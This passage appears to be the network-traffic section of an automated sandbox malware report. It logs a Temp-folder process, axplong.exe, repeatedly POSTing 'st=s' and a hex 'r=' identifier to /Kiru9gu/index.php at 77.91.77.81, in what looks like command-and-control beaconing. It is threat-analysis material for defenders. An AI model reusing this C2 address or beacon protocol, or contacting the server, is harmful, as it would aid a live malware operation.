                  Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F9A747C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                  Jul 2, 2024 00:26:33.405571938 CEST196INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Mon, 01 Jul 2024 22:26:33 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 7 <c><d>0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  84192.168.2.44982277.91.77.81807548C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe
                  TimestampBytes transferredDirectionData
                  Jul 2, 2024 00:26:33.532319069 CEST152OUTPOST /Kiru9gu/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 77.91.77.81
                  Content-Length: 4
                  Cache-Control: no-cache
                  Data Raw: 73 74 3d 73
                  Data Ascii: st=s
                  Jul 2, 2024 00:26:34.239108086 CEST219INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Mon, 01 Jul 2024 22:26:34 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Refresh: 0; url = Login.php
                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 1 0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  85192.168.2.44982377.91.77.81807548C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe
                  TimestampBytes transferredDirectionData
                  Jul 2, 2024 00:26:34.249169111 CEST304OUTPOST /Kiru9gu/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 77.91.77.81
                  Content-Length: 154
                  Cache-Control: no-cache
                  Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 39 41 37 34 37 43 32 46 33 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                  Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F9A747C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                  Jul 2, 2024 00:26:34.959758043 CEST196INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Mon, 01 Jul 2024 22:26:34 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 7 <c><d>0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  86192.168.2.44982477.91.77.81807548C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe
                  TimestampBytes transferredDirectionData
                  Jul 2, 2024 00:26:35.079485893 CEST152OUTPOST /Kiru9gu/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 77.91.77.81
                  Content-Length: 4
                  Cache-Control: no-cache
                  Data Raw: 73 74 3d 73
                  Data Ascii: st=s
                  Jul 2, 2024 00:26:35.796919107 CEST219INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Mon, 01 Jul 2024 22:26:35 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Refresh: 0; url = Login.php
                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 1 0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  87192.168.2.44982577.91.77.81807548C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe
                  TimestampBytes transferredDirectionData
                  Jul 2, 2024 00:26:35.814887047 CEST304OUTPOST /Kiru9gu/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 77.91.77.81
                  Content-Length: 154
                  Cache-Control: no-cache
                  Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 39 41 37 34 37 43 32 46 33 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                  Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F9A747C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                  Jul 2, 2024 00:26:36.541913986 CEST196INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Mon, 01 Jul 2024 22:26:36 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 7 <c><d>0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  88192.168.2.44982677.91.77.81807548C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe
                  TimestampBytes transferredDirectionData
                  Jul 2, 2024 00:26:36.655046940 CEST152OUTPOST /Kiru9gu/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 77.91.77.81
                  Content-Length: 4
                  Cache-Control: no-cache
                  Data Raw: 73 74 3d 73
                  Data Ascii: st=s
                  Jul 2, 2024 00:26:37.358474016 CEST219INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Mon, 01 Jul 2024 22:26:37 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Refresh: 0; url = Login.php
                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 1 0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  89192.168.2.44982777.91.77.81807548C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe
                  TimestampBytes transferredDirectionData
                  Jul 2, 2024 00:26:37.368011951 CEST304OUTPOST /Kiru9gu/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 77.91.77.81
                  Content-Length: 154
                  Cache-Control: no-cache
                  Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 39 41 37 34 37 43 32 46 33 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                  Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F9A747C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                  Jul 2, 2024 00:26:38.077682972 CEST196INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Mon, 01 Jul 2024 22:26:37 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 7 <c><d>0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  90192.168.2.44982877.91.77.81807548C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe
                  TimestampBytes transferredDirectionData
                  Jul 2, 2024 00:26:38.203366995 CEST152OUTPOST /Kiru9gu/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 77.91.77.81
                  Content-Length: 4
                  Cache-Control: no-cache
                  Data Raw: 73 74 3d 73
                  Data Ascii: st=s
                  Jul 2, 2024 00:26:38.901175022 CEST219INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Mon, 01 Jul 2024 22:26:38 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Refresh: 0; url = Login.php
                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 1 0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  91192.168.2.44982977.91.77.81807548C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe
                  TimestampBytes transferredDirectionData
                  Jul 2, 2024 00:26:38.926104069 CEST304OUTPOST /Kiru9gu/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 77.91.77.81
                  Content-Length: 154
                  Cache-Control: no-cache
                  Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 39 41 37 34 37 43 32 46 33 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                  Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F9A747C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                  Jul 2, 2024 00:26:39.626408100 CEST196INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Mon, 01 Jul 2024 22:26:39 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 7 <c><d>0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  92192.168.2.44983077.91.77.81807548C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe
                  TimestampBytes transferredDirectionData
                  Jul 2, 2024 00:26:40.295648098 CEST152OUTPOST /Kiru9gu/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 77.91.77.81
                  Content-Length: 4
                  Cache-Control: no-cache
                  Data Raw: 73 74 3d 73
                  Data Ascii: st=s
                  Jul 2, 2024 00:26:41.007854939 CEST219INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Mon, 01 Jul 2024 22:26:40 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Refresh: 0; url = Login.php
                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 1 0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  93192.168.2.44983177.91.77.81807548C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe
                  TimestampBytes transferredDirectionData
                  Jul 2, 2024 00:26:41.018426895 CEST304OUTPOST /Kiru9gu/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 77.91.77.81
                  Content-Length: 154
                  Cache-Control: no-cache
                  Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 39 41 37 34 37 43 32 46 33 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                  Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F9A747C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                  Jul 2, 2024 00:26:41.732228994 CEST196INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Mon, 01 Jul 2024 22:26:41 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 7 <c><d>0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  94192.168.2.44983277.91.77.81807548C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe
                  TimestampBytes transferredDirectionData
                  Jul 2, 2024 00:26:41.843025923 CEST152OUTPOST /Kiru9gu/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 77.91.77.81
                  Content-Length: 4
                  Cache-Control: no-cache
                  Data Raw: 73 74 3d 73
                  Data Ascii: st=s


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  95192.168.2.44983377.91.77.81807548C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe
                  TimestampBytes transferredDirectionData
                  Jul 2, 2024 00:26:41.859435081 CEST304OUTPOST /Kiru9gu/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 77.91.77.81
                  Content-Length: 154
                  Cache-Control: no-cache
                  Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 39 41 37 34 37 43 32 46 33 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                  Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F9A747C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                  Jul 2, 2024 00:26:42.566591978 CEST196INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Mon, 01 Jul 2024 22:26:42 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 7 <c><d>0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  96192.168.2.44983477.91.77.81807548C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe
                  TimestampBytes transferredDirectionData
                  Jul 2, 2024 00:26:43.147583008 CEST152OUTPOST /Kiru9gu/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 77.91.77.81
                  Content-Length: 4
                  Cache-Control: no-cache
                  Data Raw: 73 74 3d 73
                  Data Ascii: st=s
                  Jul 2, 2024 00:26:43.835758924 CEST219INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Mon, 01 Jul 2024 22:26:43 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Refresh: 0; url = Login.php
                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 1 0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  97192.168.2.44983577.91.77.81807548C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe
                  TimestampBytes transferredDirectionData
                  Jul 2, 2024 00:26:43.886790991 CEST304OUTPOST /Kiru9gu/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 77.91.77.81
                  Content-Length: 154
                  Cache-Control: no-cache
                  Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 39 41 37 34 37 43 32 46 33 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                  Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F9A747C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                  Jul 2, 2024 00:26:44.560575962 CEST196INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Mon, 01 Jul 2024 22:26:44 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 7 <c><d>0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  98192.168.2.44983677.91.77.81807548C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe
                  TimestampBytes transferredDirectionData
                  Jul 2, 2024 00:26:44.670752048 CEST152OUTPOST /Kiru9gu/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 77.91.77.81
                  Content-Length: 4
                  Cache-Control: no-cache
                  Data Raw: 73 74 3d 73
                  Data Ascii: st=s
                  Jul 2, 2024 00:26:45.380455971 CEST219INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Mon, 01 Jul 2024 22:26:45 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Refresh: 0; url = Login.php
                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 1 0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  99192.168.2.44983777.91.77.81807548C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe
                  TimestampBytes transferredDirectionData
                  Jul 2, 2024 00:26:45.393712044 CEST304OUTPOST /Kiru9gu/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 77.91.77.81
                  Content-Length: 154
                  Cache-Control: no-cache
                  Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 39 41 37 34 37 43 32 46 33 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                  Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F9A747C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                  Jul 2, 2024 00:26:46.084444046 CEST196INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Mon, 01 Jul 2024 22:26:45 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 7 <c><d>0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  100192.168.2.44983877.91.77.81807548C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe
                  TimestampBytes transferredDirectionData
                  Jul 2, 2024 00:26:46.214929104 CEST152OUTPOST /Kiru9gu/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 77.91.77.81
                  Content-Length: 4
                  Cache-Control: no-cache
                  Data Raw: 73 74 3d 73
                  Data Ascii: st=s
                  Jul 2, 2024 00:26:46.903192043 CEST219INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Mon, 01 Jul 2024 22:26:46 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Refresh: 0; url = Login.php
                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 1 0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  101192.168.2.44983977.91.77.81807548C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe
                  TimestampBytes transferredDirectionData
                  Jul 2, 2024 00:26:47.327984095 CEST304OUTPOST /Kiru9gu/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 77.91.77.81
                  Content-Length: 154
                  Cache-Control: no-cache
                  Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 39 41 37 34 37 43 32 46 33 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                  Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F9A747C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                  Jul 2, 2024 00:26:48.034367085 CEST196INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Mon, 01 Jul 2024 22:26:47 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 7 <c><d>0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  102192.168.2.44984077.91.77.81807548C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe
                  TimestampBytes transferredDirectionData
                  Jul 2, 2024 00:26:48.155848026 CEST152OUTPOST /Kiru9gu/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 77.91.77.81
                  Content-Length: 4
                  Cache-Control: no-cache
                  Data Raw: 73 74 3d 73
                  Data Ascii: st=s
                  Jul 2, 2024 00:26:48.849637985 CEST219INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Mon, 01 Jul 2024 22:26:48 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Refresh: 0; url = Login.php
                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 1 0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  103192.168.2.44984177.91.77.81807548C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe
                  TimestampBytes transferredDirectionData
                  Jul 2, 2024 00:26:48.866648912 CEST304OUTPOST /Kiru9gu/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 77.91.77.81
                  Content-Length: 154
                  Cache-Control: no-cache
                  Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 39 41 37 34 37 43 32 46 33 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                  Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F9A747C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                  Jul 2, 2024 00:26:49.575920105 CEST196INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Mon, 01 Jul 2024 22:26:49 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 7 <c><d>0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  104192.168.2.44984277.91.77.81807548C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe
                  TimestampBytes transferredDirectionData
                  Jul 2, 2024 00:26:49.918056011 CEST152OUTPOST /Kiru9gu/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 77.91.77.81
                  Content-Length: 4
                  Cache-Control: no-cache
                  Data Raw: 73 74 3d 73
                  Data Ascii: st=s
                  Jul 2, 2024 00:26:50.593754053 CEST219INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Mon, 01 Jul 2024 22:26:50 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Refresh: 0; url = Login.php
                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 1 0
                  Jul 2, 2024 00:26:51.002363920 CEST304OUTPOST /Kiru9gu/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 77.91.77.81
                  Content-Length: 154
                  Cache-Control: no-cache
                  Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 39 41 37 34 37 43 32 46 33 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                  Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F9A747C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                  Jul 2, 2024 00:26:51.225699902 CEST196INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Mon, 01 Jul 2024 22:26:51 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 7 <c><d>0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  105192.168.2.44984377.91.77.81807548C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe
                  TimestampBytes transferredDirectionData
                  Jul 2, 2024 00:26:51.351099014 CEST152OUTPOST /Kiru9gu/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 77.91.77.81
                  Content-Length: 4
                  Cache-Control: no-cache
                  Data Raw: 73 74 3d 73
                  Data Ascii: st=s
                  Jul 2, 2024 00:26:52.073173046 CEST219INHTTP/1.1 200 OK
